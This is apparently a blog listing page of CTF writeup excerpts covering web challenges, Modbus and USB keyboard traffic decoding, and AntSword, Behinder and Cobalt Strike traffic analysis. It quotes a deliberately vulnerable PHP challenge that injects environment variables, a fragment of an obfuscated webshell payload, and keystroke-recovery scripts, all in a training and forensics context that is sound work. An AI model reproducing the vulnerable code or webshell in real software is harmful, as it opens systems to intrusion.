2024 XYCTF: Full Web Solutions & Misc Writeup

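Web ezhttp. Key points: information disclosure + basic request crafting. Visit /robots.txt, then visit /l0g1n.txt: username: XYCTF password: @JOILha!wuigqi123$. Log in, add a Referer header, add a User-Agent, use the Burp (fake ip) plugin to handle the IP headers in one shot, add a Via header, add a Cookie, and the flag can be retrieved ...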

April 26, 2024 · 26 min · 12612 words · J1rrY

2024 VNCTF Web Partial Writeup

Web givenphp. Key point: LD_LOAD environment variable hijacking.

    <?php
    highlight_file(__FILE__);
    if(isset($_POST['upload'])){
        handleFileUpload($_FILES['file']);
    }

    if(isset($_GET['challenge'])){
        waf();
        $value=$_GET['value'];
        $key=$_GET['key'];
        $func=create_function("","putenv('$key=$value');");
        if($func==$_GET['guess']){
            $func();
            system("whoami");
        }
    }
    function waf()
    {
        if(preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['key'])||preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['value'])){
            die("evil input!!!");
        }
    }
    function handleFileUpload($file)
    {
        $uploadDirectory = '/tmp/';

        if ($file['error'] !== UPLOAD_ERR_OK) {
            echo '文件上传失败。';
            return;
        }
        $fileExtension = pathinfo($file['name'], PATHINFO_EXTENSION);

        $newFileName = uniqid('uploaded_file_', true) . '.' . $fileExtension;
        $destination = $uploadDirectory . $newFileName;
        if (move_uploaded_file($file['tmp_name'], $destination)) {
            echo $destination;
        } else {
            echo '文件移动失败。';
        }
    }

Direct injection of environment variables is filtered ...

April 21, 2024 · 2 min · 553 words · J1rrY

2024 Ocean University of China CTF Partial Writeup

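Web 菜鸟工具2: how to read memory with Python. 1. /proc/*/fd/* chroot escape. 2. Reading memory with Python, relying on Python parsing the memory of its own process. Method 1: ctypes is a Python standard-library module that provides C-compatible data types and allows calling functions in shared libraries. Pointer handling: ctypes lets you manipulate pointers in Python, including creating, reading and modifying pointer values. Reference link: L3HCTF Just a pyjail ...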

April 21, 2024 · 14 min · 6800 words · J1rrY

CISCN 2023 Preliminary Round: Encrypted Production Traffic

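The challenge attachment is modbus.pcap. It contains several protocols, but this challenge is most likely testing modbus. The last two characters of each Query follow a pattern, and the guess is an encoding from the base family, so try extracting the data from the traffic. The value 22871 in the Word Count field is decimal, converted to hexadecimal and then to an ASCII string. First extract the packets and use the filter to identify the field:

    tshark -r modbus.pcap -Y "modbus" -T json > 1.json
    tshark -r modbus.pcap -Y "modbus" -T json -e modbus.word_cnt > 2.json

Then extract the values as an ordinary dictionary lookup. Because some entries do not have the modbus.word_cnt field, use try-catch to handle the missing values ...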

April 21, 2024 · 1 min · 224 words · J1rrY

CISCN 2022 Preliminary Round ez_usb Traffic Analysis Writeup

Again, reading forward from the first URB, 2.8.1, 2.10.1 and 2.4.1 are all present. But 2.4.1 is clearly 7 bytes, which does not meet the USB traffic requirement, so only 2.8.1 and 2.10.1 are considered.

    tshark -r ez_usb.pcapng -T json -Y "usb.src == \"2.8.1\"" -e usbhid.data > 281.json

Then extract the data as usual:

    import json

    with open('281.json') as f:
        data = json.load(f)

    a = []
    for i in data:
        try:
            a.append(i['_source']['layers']['usbhid.data'][0])
        except (KeyError, IndexError):
            # packet without a usbhid.data field
            continue

    # keyboard traffic
    normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
                  "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
                  "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z", "1e":"1", "1f":"2", "20":"3", "21":"4",
                  "22":"5", "23":"6", "24":"7", "25":"8", "26":"9", "27":"0", "28":"<RET>", "29":"<ESC>", "2a":"<DEL>",
                  "2b":"\t", "2c":"<SPACE>", "2d":"-", "2e":"=", "2f":"[", "30":"]", "31":"\\", "32":"<NON>", "33":";",
                  "34":"'", "35":"<GA>", "36":",", "37":".", "38":"/", "39":"<CAP>", "3a":"<F1>", "3b":"<F2>",
                  "3c":"<F3>", "3d":"<F4>", "3e":"<F5>", "3f":"<F6>", "40":"<F7>", "41":"<F8>", "42":"<F9>",
                  "43":"<F10>", "44":"<F11>", "45":"<F12>"}
    shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
                 "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
                 "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z", "1e":"!", "1f":"@", "20":"#", "21":"$",
                 "22":"%", "23":"^", "24":"&", "25":"*", "26":"(", "27":")", "28":"<RET>", "29":"<ESC>", "2a":"<DEL>",
                 "2b":"\t", "2c":"<SPACE>", "2d":"_", "2e":"+", "2f":"{", "30":"}", "31":"|", "32":"<NON>", "33":"\"",
                 "34":":", "35":"<GA>", "36":"<", "37":">", "38":"?", "39":"<CAP>", "3a":"<F1>", "3b":"<F2>",
                 "3c":"<F3>", "3d":"<F4>", "3e":"<F5>", "3f":"<F6>", "40":"<F7>", "41":"<F8>", "42":"<F9>",
                 "43":"<F10>", "44":"<F11>", "45":"<F12>"}

    nums = []
    for line in a:
        if len(line) != 16:  # for mouse traffic change the length to 8
            continue
        # byte 0 (modifier) followed by byte 2 (first key code)
        nums.append(line[0:2] + line[4:6])
    print(nums)

    output = []
    for n in nums:
        if n[2:4] == "00":
            continue
        if n[2:4] in normalKeys:
            if n[0:2] == "02":
                output.append(shiftKeys[n[2:4]])
            else:
                output.append(normalKeys[n[2:4]])
        else:
            output.append('[unknown]')
    print(output)

    # apply <DEL>: drop the marker and the key typed before it
    while '<DEL>' in output:
        idx = output.index('<DEL>')
        del output[idx]
        if idx > 0:
            del output[idx - 1]

    # apply <CAP>: upper-case everything typed while Caps Lock is on
    flag = 0
    for i in range(len(output)):
        try:
            if output[i] == "<CAP>":
                flag += 1
                output.pop(i)
                if flag == 2:
                    flag = 0
            if flag != 0:
                output[i] = output[i].upper()
        except IndexError:
            # the list shrank after pop()
            pass
    print('output :' + "".join(output))

...

April 11, 2024 · 2 min · 548 words · J1rrY

EIS 2019 webshell

The requests are clearly HTTP POST traffic, and it can also be identified as AntSword (蚁剑) traffic. Filter further with:

    http.request.method == "POST"

Follow the TCP stream directly to get the payload (partial listing):

    @eVAl(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28)

Print the content directly by wrapping the full ChR chain in <?php echo( ... ); ?>. After beautifying the resulting PHP code ...

April 11, 2024 · 1 min · 330 words · J1rrY

H&NCTF 2024 ez_pecp wp

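Key points: Behinder (冰蝎) webshell traffic analysis + Cobalt Strike (CS) 4.x traffic decryption. Two capture files are given. The first is ctf1.pcapng; look at its HTTP requests. In CS the traffic signature is based on the TLS protocol. In http-beacon communication, the GET method is used by default to request addresses such as /dpixel, /__utm.gif and /pixel.gif, and when commands are issued a request is made to /submit.php?id=<a string of digits> ...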

April 11, 2024 · 2 min · 935 words · J1rrY

MoeCTF 2022 usb

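Go straight to the first input URB. The data to extract is the HID Data. Filter for extraction:

    tshark -r usb.pcapng -Y "usb.src==\"2.2.1\"" -T json >1.json

Take the usbhid.data field:

    tshark -r usb.pcapng -Y "usb.src==\"2.2.1\"" -T json -e usbhid.data >2.json

Then read the values as an ordinary dictionary lookup:

    import json

    with open('./2.json') as f:
        data = json.load(f)

    a = []
    for i in data:
        try:
            a.append(i['_source']['layers']['usbhid.data'][0])
        except (KeyError, IndexError):
            # packet without a usbhid.data field
            continue
    print(a)

The values are 16 characters long. Adjust the script as the situation requires; simply combine it with the all-purpose USB traffic script ...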

April 11, 2024 · 2 min · 564 words · J1rrY